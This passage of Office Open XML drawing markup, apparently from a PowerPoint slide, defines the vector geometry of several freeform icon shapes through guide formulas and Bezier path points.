                      <a:pt x="0" y="89"/>
                      <a:pt x="3" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="95"/>
                      <a:pt x="6" y="96"/>
                      <a:pt x="8" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="97"/>
                      <a:pt x="13" y="96"/>
                      <a:pt x="15" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="36"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="95" y="36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71"/>
                      <a:pt x="93" y="75"/>
                      <a:pt x="97" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="76"/>
                      <a:pt x="106" y="73"/>
                      <a:pt x="107" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="10"/>
                      <a:pt x="116" y="10"/>
                      <a:pt x="116" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="57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8" name="Freeform 210">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6019FA-0563-4B46-9E25-302C56548C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868" y="5728727"/>
                <a:ext cx="319045" cy="342532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 90 w 100"/>
                  <a:gd name="T1" fmla="*/ 0 h 107"/>
                  <a:gd name="T2" fmla="*/ 10 w 100"/>
                  <a:gd name="T3" fmla="*/ 0 h 107"/>
                  <a:gd name="T4" fmla="*/ 0 w 100"/>
                  <a:gd name="T5" fmla="*/ 10 h 107"/>
                  <a:gd name="T6" fmla="*/ 0 w 100"/>
                  <a:gd name="T7" fmla="*/ 97 h 107"/>
                  <a:gd name="T8" fmla="*/ 10 w 100"/>
                  <a:gd name="T9" fmla="*/ 107 h 107"/>
                  <a:gd name="T10" fmla="*/ 90 w 100"/>
                  <a:gd name="T11" fmla="*/ 107 h 107"/>
                  <a:gd name="T12" fmla="*/ 100 w 100"/>
                  <a:gd name="T13" fmla="*/ 97 h 107"/>
                  <a:gd name="T14" fmla="*/ 100 w 100"/>
                  <a:gd name="T15" fmla="*/ 10 h 107"/>
                  <a:gd name="T16" fmla="*/ 90 w 100"/>
                  <a:gd name="T17" fmla="*/ 0 h 107"/>
                  <a:gd name="T18" fmla="*/ 86 w 100"/>
                  <a:gd name="T19" fmla="*/ 93 h 107"/>
                  <a:gd name="T20" fmla="*/ 13 w 100"/>
                  <a:gd name="T21" fmla="*/ 93 h 107"/>
                  <a:gd name="T22" fmla="*/ 13 w 100"/>
                  <a:gd name="T23" fmla="*/ 13 h 107"/>
                  <a:gd name="T24" fmla="*/ 86 w 100"/>
                  <a:gd name="T25" fmla="*/ 13 h 107"/>
                  <a:gd name="T26" fmla="*/ 86 w 100"/>
                  <a:gd name="T27" fmla="*/ 93 h 107"/>
                  <a:gd name="T28" fmla="*/ 26 w 100"/>
                  <a:gd name="T29" fmla="*/ 47 h 107"/>
                  <a:gd name="T30" fmla="*/ 73 w 100"/>
                  <a:gd name="T31" fmla="*/ 47 h 107"/>
                  <a:gd name="T32" fmla="*/ 73 w 100"/>
                  <a:gd name="T33" fmla="*/ 53 h 107"/>
                  <a:gd name="T34" fmla="*/ 26 w 100"/>
                  <a:gd name="T35" fmla="*/ 53 h 107"/>
                  <a:gd name="T36" fmla="*/ 26 w 100"/>
                  <a:gd name="T37" fmla="*/ 47 h 107"/>
                  <a:gd name="T38" fmla="*/ 26 w 100"/>
                  <a:gd name="T39" fmla="*/ 60 h 107"/>
                  <a:gd name="T40" fmla="*/ 73 w 100"/>
                  <a:gd name="T41" fmla="*/ 60 h 107"/>
                  <a:gd name="T42" fmla="*/ 73 w 100"/>
                  <a:gd name="T43" fmla="*/ 67 h 107"/>
                  <a:gd name="T44" fmla="*/ 26 w 100"/>
                  <a:gd name="T45" fmla="*/ 67 h 107"/>
                  <a:gd name="T46" fmla="*/ 26 w 100"/>
                  <a:gd name="T47" fmla="*/ 60 h 107"/>
                  <a:gd name="T48" fmla="*/ 26 w 100"/>
                  <a:gd name="T49" fmla="*/ 73 h 107"/>
                  <a:gd name="T50" fmla="*/ 73 w 100"/>
                  <a:gd name="T51" fmla="*/ 73 h 107"/>
                  <a:gd name="T52" fmla="*/ 73 w 100"/>
                  <a:gd name="T53" fmla="*/ 80 h 107"/>
                  <a:gd name="T54" fmla="*/ 26 w 100"/>
                  <a:gd name="T55" fmla="*/ 80 h 107"/>
                  <a:gd name="T56" fmla="*/ 26 w 100"/>
                  <a:gd name="T57" fmla="*/ 73 h 107"/>
                  <a:gd name="T58" fmla="*/ 26 w 100"/>
                  <a:gd name="T59" fmla="*/ 33 h 107"/>
                  <a:gd name="T60" fmla="*/ 73 w 100"/>
                  <a:gd name="T61" fmla="*/ 33 h 107"/>
                  <a:gd name="T62" fmla="*/ 73 w 100"/>
                  <a:gd name="T63" fmla="*/ 40 h 107"/>
                  <a:gd name="T64" fmla="*/ 26 w 100"/>
                  <a:gd name="T65" fmla="*/ 40 h 107"/>
                  <a:gd name="T66" fmla="*/ 26 w 100"/>
                  <a:gd name="T67" fmla="*/ 33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" h="107">
                    <a:moveTo>
                      <a:pt x="90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2"/>
                      <a:pt x="4" y="107"/>
                      <a:pt x="10" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="107"/>
                      <a:pt x="90" y="107"/>
                      <a:pt x="90" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="107"/>
                      <a:pt x="100" y="102"/>
                      <a:pt x="100" y="97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100" y="5"/>
                      <a:pt x="95" y="0"/>
                      <a:pt x="90" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86" y="93"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="93"/>
                      <a:pt x="13" y="93"/>
                      <a:pt x="13" y="9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86" y="13"/>
                      <a:pt x="86" y="13"/>
                      <a:pt x="86" y="13"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="86" y="93"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="47"/>
                    </a:move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26" y="53"/>
                      <a:pt x="26" y="53"/>
                      <a:pt x="26" y="53"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="60"/>
                      <a:pt x="73" y="60"/>
                      <a:pt x="73" y="60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26" y="67"/>
                      <a:pt x="26" y="67"/>
                      <a:pt x="26" y="67"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="60"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="73"/>
                      <a:pt x="73" y="73"/>
                      <a:pt x="73" y="73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26" y="80"/>
                      <a:pt x="26" y="80"/>
                      <a:pt x="26" y="80"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="73"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="33"/>
                    </a:move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40"/>
                      <a:pt x="73" y="40"/>
                      <a:pt x="73" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="40"/>
                      <a:pt x="26" y="40"/>
                      <a:pt x="26" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26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49" name="Freeform 211">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B829D82-00AE-4524-A3CF-6855C34F6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1119" y="5771788"/>
                <a:ext cx="366021" cy="364063"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 86 w 114"/>
                  <a:gd name="T1" fmla="*/ 72 h 114"/>
                  <a:gd name="T2" fmla="*/ 66 w 114"/>
                  <a:gd name="T3" fmla="*/ 52 h 114"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 16 h 114"/>
                  <a:gd name="T6" fmla="*/ 100 w 114"/>
                  <a:gd name="T7" fmla="*/ 2 h 114"/>
                  <a:gd name="T8" fmla="*/ 40 w 114"/>
                  <a:gd name="T9" fmla="*/ 26 h 114"/>
                  <a:gd name="T10" fmla="*/ 21 w 114"/>
                  <a:gd name="T11" fmla="*/ 7 h 114"/>
                  <a:gd name="T12" fmla="*/ 4 w 114"/>
                  <a:gd name="T13" fmla="*/ 4 h 114"/>
                  <a:gd name="T14" fmla="*/ 7 w 114"/>
                  <a:gd name="T15" fmla="*/ 21 h 114"/>
                  <a:gd name="T16" fmla="*/ 26 w 114"/>
                  <a:gd name="T17" fmla="*/ 40 h 114"/>
                  <a:gd name="T18" fmla="*/ 2 w 114"/>
                  <a:gd name="T19" fmla="*/ 100 h 114"/>
                  <a:gd name="T20" fmla="*/ 16 w 114"/>
                  <a:gd name="T21" fmla="*/ 114 h 114"/>
                  <a:gd name="T22" fmla="*/ 52 w 114"/>
                  <a:gd name="T23" fmla="*/ 66 h 114"/>
                  <a:gd name="T24" fmla="*/ 72 w 114"/>
                  <a:gd name="T25" fmla="*/ 86 h 114"/>
                  <a:gd name="T26" fmla="*/ 72 w 114"/>
                  <a:gd name="T27" fmla="*/ 114 h 114"/>
                  <a:gd name="T28" fmla="*/ 86 w 114"/>
                  <a:gd name="T29" fmla="*/ 114 h 114"/>
                  <a:gd name="T30" fmla="*/ 93 w 114"/>
                  <a:gd name="T31" fmla="*/ 93 h 114"/>
                  <a:gd name="T32" fmla="*/ 114 w 114"/>
                  <a:gd name="T33" fmla="*/ 86 h 114"/>
                  <a:gd name="T34" fmla="*/ 114 w 114"/>
                  <a:gd name="T35" fmla="*/ 72 h 114"/>
                  <a:gd name="T36" fmla="*/ 86 w 114"/>
                  <a:gd name="T37" fmla="*/ 7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14">
                    <a:moveTo>
                      <a:pt x="86" y="72"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="52"/>
                      <a:pt x="66" y="52"/>
                      <a:pt x="66" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="16"/>
                      <a:pt x="114" y="16"/>
                      <a:pt x="114" y="16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16" y="2"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="4" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="2" y="16"/>
                      <a:pt x="7" y="21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" y="100"/>
                      <a:pt x="2" y="100"/>
                      <a:pt x="2" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="114"/>
                      <a:pt x="16" y="114"/>
                      <a:pt x="16" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="66"/>
                      <a:pt x="52" y="66"/>
                      <a:pt x="52" y="66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72" y="114"/>
                      <a:pt x="72" y="114"/>
                      <a:pt x="72" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="114"/>
                      <a:pt x="86" y="114"/>
                      <a:pt x="86" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="93"/>
                      <a:pt x="93" y="93"/>
                      <a:pt x="93" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="86"/>
                      <a:pt x="114" y="86"/>
                      <a:pt x="114" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="72"/>
                      <a:pt x="114" y="72"/>
                      <a:pt x="114" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="72"/>
                      <a:pt x="86" y="72"/>
                      <a:pt x="86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0" name="Freeform 212">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641655FE-CB04-4089-A310-763D482EB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4607" y="6221974"/>
                <a:ext cx="344490" cy="281855"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 11 h 88"/>
                  <a:gd name="T2" fmla="*/ 96 w 108"/>
                  <a:gd name="T3" fmla="*/ 14 h 88"/>
                  <a:gd name="T4" fmla="*/ 105 w 108"/>
                  <a:gd name="T5" fmla="*/ 2 h 88"/>
                  <a:gd name="T6" fmla="*/ 91 w 108"/>
                  <a:gd name="T7" fmla="*/ 7 h 88"/>
                  <a:gd name="T8" fmla="*/ 75 w 108"/>
                  <a:gd name="T9" fmla="*/ 0 h 88"/>
                  <a:gd name="T10" fmla="*/ 53 w 108"/>
                  <a:gd name="T11" fmla="*/ 22 h 88"/>
                  <a:gd name="T12" fmla="*/ 54 w 108"/>
                  <a:gd name="T13" fmla="*/ 27 h 88"/>
                  <a:gd name="T14" fmla="*/ 8 w 108"/>
                  <a:gd name="T15" fmla="*/ 4 h 88"/>
                  <a:gd name="T16" fmla="*/ 5 w 108"/>
                  <a:gd name="T17" fmla="*/ 15 h 88"/>
                  <a:gd name="T18" fmla="*/ 15 w 108"/>
                  <a:gd name="T19" fmla="*/ 34 h 88"/>
                  <a:gd name="T20" fmla="*/ 5 w 108"/>
                  <a:gd name="T21" fmla="*/ 31 h 88"/>
                  <a:gd name="T22" fmla="*/ 5 w 108"/>
                  <a:gd name="T23" fmla="*/ 31 h 88"/>
                  <a:gd name="T24" fmla="*/ 23 w 108"/>
                  <a:gd name="T25" fmla="*/ 53 h 88"/>
                  <a:gd name="T26" fmla="*/ 17 w 108"/>
                  <a:gd name="T27" fmla="*/ 54 h 88"/>
                  <a:gd name="T28" fmla="*/ 13 w 108"/>
                  <a:gd name="T29" fmla="*/ 53 h 88"/>
                  <a:gd name="T30" fmla="*/ 33 w 108"/>
                  <a:gd name="T31" fmla="*/ 69 h 88"/>
                  <a:gd name="T32" fmla="*/ 6 w 108"/>
                  <a:gd name="T33" fmla="*/ 78 h 88"/>
                  <a:gd name="T34" fmla="*/ 0 w 108"/>
                  <a:gd name="T35" fmla="*/ 78 h 88"/>
                  <a:gd name="T36" fmla="*/ 34 w 108"/>
                  <a:gd name="T37" fmla="*/ 88 h 88"/>
                  <a:gd name="T38" fmla="*/ 97 w 108"/>
                  <a:gd name="T39" fmla="*/ 25 h 88"/>
                  <a:gd name="T40" fmla="*/ 97 w 108"/>
                  <a:gd name="T41" fmla="*/ 22 h 88"/>
                  <a:gd name="T42" fmla="*/ 108 w 108"/>
                  <a:gd name="T43" fmla="*/ 1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88">
                    <a:moveTo>
                      <a:pt x="108" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="12"/>
                      <a:pt x="100" y="13"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="11"/>
                      <a:pt x="104" y="7"/>
                      <a:pt x="105" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="4"/>
                      <a:pt x="96" y="6"/>
                      <a:pt x="91" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="3"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="75" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="0"/>
                      <a:pt x="53" y="10"/>
                      <a:pt x="53" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="24"/>
                      <a:pt x="53" y="26"/>
                      <a:pt x="54" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="26"/>
                      <a:pt x="19" y="18"/>
                      <a:pt x="8" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="7"/>
                      <a:pt x="5" y="11"/>
                      <a:pt x="5" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="23"/>
                      <a:pt x="9" y="30"/>
                      <a:pt x="15" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="34"/>
                      <a:pt x="8" y="33"/>
                      <a:pt x="5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42"/>
                      <a:pt x="12" y="51"/>
                      <a:pt x="23" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="53"/>
                      <a:pt x="19" y="54"/>
                      <a:pt x="17" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="54"/>
                      <a:pt x="14" y="54"/>
                      <a:pt x="13" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="62"/>
                      <a:pt x="23" y="69"/>
                      <a:pt x="33" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="75"/>
                      <a:pt x="16" y="78"/>
                      <a:pt x="6" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="78"/>
                      <a:pt x="2" y="78"/>
                      <a:pt x="0" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="84"/>
                      <a:pt x="22" y="88"/>
                      <a:pt x="34" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="88"/>
                      <a:pt x="97" y="54"/>
                      <a:pt x="97" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="24"/>
                      <a:pt x="97" y="23"/>
                      <a:pt x="97" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="19"/>
                      <a:pt x="105" y="15"/>
                      <a:pt x="10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1" name="Freeform 213">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A4EC7B-E60A-4110-B576-8C000ACE3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5471" y="6398133"/>
                <a:ext cx="242709" cy="252495"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 124"/>
                  <a:gd name="T1" fmla="*/ 0 h 129"/>
                  <a:gd name="T2" fmla="*/ 66 w 124"/>
                  <a:gd name="T3" fmla="*/ 59 h 129"/>
                  <a:gd name="T4" fmla="*/ 124 w 124"/>
                  <a:gd name="T5" fmla="*/ 0 h 129"/>
                  <a:gd name="T6" fmla="*/ 124 w 124"/>
                  <a:gd name="T7" fmla="*/ 129 h 129"/>
                  <a:gd name="T8" fmla="*/ 66 w 124"/>
                  <a:gd name="T9" fmla="*/ 70 h 129"/>
                  <a:gd name="T10" fmla="*/ 66 w 124"/>
                  <a:gd name="T11" fmla="*/ 129 h 129"/>
                  <a:gd name="T12" fmla="*/ 0 w 124"/>
                  <a:gd name="T13" fmla="*/ 64 h 129"/>
                  <a:gd name="T14" fmla="*/ 66 w 124"/>
                  <a:gd name="T15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4" h="129">
                    <a:moveTo>
                      <a:pt x="66" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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2" name="Freeform 214">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0974EE1C-3507-4AC7-AD43-86DA9CC611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77029" y="6449024"/>
                <a:ext cx="366021" cy="364063"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 83 h 114"/>
                  <a:gd name="T2" fmla="*/ 10 w 114"/>
                  <a:gd name="T3" fmla="*/ 93 h 114"/>
                  <a:gd name="T4" fmla="*/ 30 w 114"/>
                  <a:gd name="T5" fmla="*/ 73 h 114"/>
                  <a:gd name="T6" fmla="*/ 41 w 114"/>
                  <a:gd name="T7" fmla="*/ 84 h 114"/>
                  <a:gd name="T8" fmla="*/ 21 w 114"/>
                  <a:gd name="T9" fmla="*/ 104 h 114"/>
                  <a:gd name="T10" fmla="*/ 31 w 114"/>
                  <a:gd name="T11" fmla="*/ 114 h 114"/>
                  <a:gd name="T12" fmla="*/ 51 w 114"/>
                  <a:gd name="T13" fmla="*/ 94 h 114"/>
                  <a:gd name="T14" fmla="*/ 64 w 114"/>
                  <a:gd name="T15" fmla="*/ 107 h 114"/>
                  <a:gd name="T16" fmla="*/ 74 w 114"/>
                  <a:gd name="T17" fmla="*/ 97 h 114"/>
                  <a:gd name="T18" fmla="*/ 17 w 114"/>
                  <a:gd name="T19" fmla="*/ 40 h 114"/>
                  <a:gd name="T20" fmla="*/ 7 w 114"/>
                  <a:gd name="T21" fmla="*/ 50 h 114"/>
                  <a:gd name="T22" fmla="*/ 20 w 114"/>
                  <a:gd name="T23" fmla="*/ 63 h 114"/>
                  <a:gd name="T24" fmla="*/ 0 w 114"/>
                  <a:gd name="T25" fmla="*/ 83 h 114"/>
                  <a:gd name="T26" fmla="*/ 84 w 114"/>
                  <a:gd name="T27" fmla="*/ 30 h 114"/>
                  <a:gd name="T28" fmla="*/ 26 w 114"/>
                  <a:gd name="T29" fmla="*/ 39 h 114"/>
                  <a:gd name="T30" fmla="*/ 75 w 114"/>
                  <a:gd name="T31" fmla="*/ 88 h 114"/>
                  <a:gd name="T32" fmla="*/ 84 w 114"/>
                  <a:gd name="T33" fmla="*/ 30 h 114"/>
                  <a:gd name="T34" fmla="*/ 93 w 114"/>
                  <a:gd name="T35" fmla="*/ 35 h 114"/>
                  <a:gd name="T36" fmla="*/ 79 w 114"/>
                  <a:gd name="T37" fmla="*/ 21 h 114"/>
                  <a:gd name="T38" fmla="*/ 100 w 114"/>
                  <a:gd name="T39" fmla="*/ 0 h 114"/>
                  <a:gd name="T40" fmla="*/ 114 w 114"/>
                  <a:gd name="T41" fmla="*/ 14 h 114"/>
                  <a:gd name="T42" fmla="*/ 93 w 114"/>
                  <a:gd name="T43" fmla="*/ 35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14">
                    <a:moveTo>
                      <a:pt x="0" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="93"/>
                      <a:pt x="10" y="93"/>
                      <a:pt x="10" y="9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31" y="114"/>
                      <a:pt x="31" y="114"/>
                      <a:pt x="31" y="114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74" y="97"/>
                      <a:pt x="74" y="97"/>
                      <a:pt x="74" y="97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20" y="63"/>
                      <a:pt x="20" y="63"/>
                      <a:pt x="20" y="63"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="83"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="84" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="12"/>
                      <a:pt x="41" y="26"/>
                      <a:pt x="26" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="88"/>
                      <a:pt x="75" y="88"/>
                      <a:pt x="75" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="73"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="84" y="30"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="93" y="35"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="21"/>
                      <a:pt x="79" y="21"/>
                      <a:pt x="79" y="21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14" y="14"/>
                      <a:pt x="114" y="14"/>
                      <a:pt x="114" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="93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3" name="Freeform 215">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD3E7D2-2E09-4FD1-94DC-DF5B48DAB0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86444" y="6147595"/>
                <a:ext cx="366021" cy="358191"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 115"/>
                  <a:gd name="T1" fmla="*/ 36 h 112"/>
                  <a:gd name="T2" fmla="*/ 86 w 115"/>
                  <a:gd name="T3" fmla="*/ 1 h 112"/>
                  <a:gd name="T4" fmla="*/ 86 w 115"/>
                  <a:gd name="T5" fmla="*/ 1 h 112"/>
                  <a:gd name="T6" fmla="*/ 77 w 115"/>
                  <a:gd name="T7" fmla="*/ 4 h 112"/>
                  <a:gd name="T8" fmla="*/ 32 w 115"/>
                  <a:gd name="T9" fmla="*/ 39 h 112"/>
                  <a:gd name="T10" fmla="*/ 36 w 115"/>
                  <a:gd name="T11" fmla="*/ 56 h 112"/>
                  <a:gd name="T12" fmla="*/ 42 w 115"/>
                  <a:gd name="T13" fmla="*/ 73 h 112"/>
                  <a:gd name="T14" fmla="*/ 98 w 115"/>
                  <a:gd name="T15" fmla="*/ 81 h 112"/>
                  <a:gd name="T16" fmla="*/ 106 w 115"/>
                  <a:gd name="T17" fmla="*/ 78 h 112"/>
                  <a:gd name="T18" fmla="*/ 106 w 115"/>
                  <a:gd name="T19" fmla="*/ 79 h 112"/>
                  <a:gd name="T20" fmla="*/ 110 w 115"/>
                  <a:gd name="T21" fmla="*/ 36 h 112"/>
                  <a:gd name="T22" fmla="*/ 102 w 115"/>
                  <a:gd name="T23" fmla="*/ 73 h 112"/>
                  <a:gd name="T24" fmla="*/ 99 w 115"/>
                  <a:gd name="T25" fmla="*/ 73 h 112"/>
                  <a:gd name="T26" fmla="*/ 93 w 115"/>
                  <a:gd name="T27" fmla="*/ 67 h 112"/>
                  <a:gd name="T28" fmla="*/ 83 w 115"/>
                  <a:gd name="T29" fmla="*/ 43 h 112"/>
                  <a:gd name="T30" fmla="*/ 80 w 115"/>
                  <a:gd name="T31" fmla="*/ 18 h 112"/>
                  <a:gd name="T32" fmla="*/ 82 w 115"/>
                  <a:gd name="T33" fmla="*/ 10 h 112"/>
                  <a:gd name="T34" fmla="*/ 84 w 115"/>
                  <a:gd name="T35" fmla="*/ 8 h 112"/>
                  <a:gd name="T36" fmla="*/ 87 w 115"/>
                  <a:gd name="T37" fmla="*/ 9 h 112"/>
                  <a:gd name="T38" fmla="*/ 93 w 115"/>
                  <a:gd name="T39" fmla="*/ 15 h 112"/>
                  <a:gd name="T40" fmla="*/ 103 w 115"/>
                  <a:gd name="T41" fmla="*/ 38 h 112"/>
                  <a:gd name="T42" fmla="*/ 106 w 115"/>
                  <a:gd name="T43" fmla="*/ 63 h 112"/>
                  <a:gd name="T44" fmla="*/ 104 w 115"/>
                  <a:gd name="T45" fmla="*/ 71 h 112"/>
                  <a:gd name="T46" fmla="*/ 102 w 115"/>
                  <a:gd name="T47" fmla="*/ 73 h 112"/>
                  <a:gd name="T48" fmla="*/ 28 w 115"/>
                  <a:gd name="T49" fmla="*/ 58 h 112"/>
                  <a:gd name="T50" fmla="*/ 25 w 115"/>
                  <a:gd name="T51" fmla="*/ 42 h 112"/>
                  <a:gd name="T52" fmla="*/ 11 w 115"/>
                  <a:gd name="T53" fmla="*/ 47 h 112"/>
                  <a:gd name="T54" fmla="*/ 4 w 115"/>
                  <a:gd name="T55" fmla="*/ 49 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 61 h 112"/>
                  <a:gd name="T58" fmla="*/ 3 w 115"/>
                  <a:gd name="T59" fmla="*/ 70 h 112"/>
                  <a:gd name="T60" fmla="*/ 11 w 115"/>
                  <a:gd name="T61" fmla="*/ 78 h 112"/>
                  <a:gd name="T62" fmla="*/ 19 w 115"/>
                  <a:gd name="T63" fmla="*/ 76 h 112"/>
                  <a:gd name="T64" fmla="*/ 34 w 115"/>
                  <a:gd name="T65" fmla="*/ 73 h 112"/>
                  <a:gd name="T66" fmla="*/ 28 w 115"/>
                  <a:gd name="T67" fmla="*/ 58 h 112"/>
                  <a:gd name="T68" fmla="*/ 47 w 115"/>
                  <a:gd name="T69" fmla="*/ 77 h 112"/>
                  <a:gd name="T70" fmla="*/ 32 w 115"/>
                  <a:gd name="T71" fmla="*/ 78 h 112"/>
                  <a:gd name="T72" fmla="*/ 50 w 115"/>
                  <a:gd name="T73" fmla="*/ 110 h 112"/>
                  <a:gd name="T74" fmla="*/ 54 w 115"/>
                  <a:gd name="T75" fmla="*/ 111 h 112"/>
                  <a:gd name="T76" fmla="*/ 66 w 115"/>
                  <a:gd name="T77" fmla="*/ 102 h 112"/>
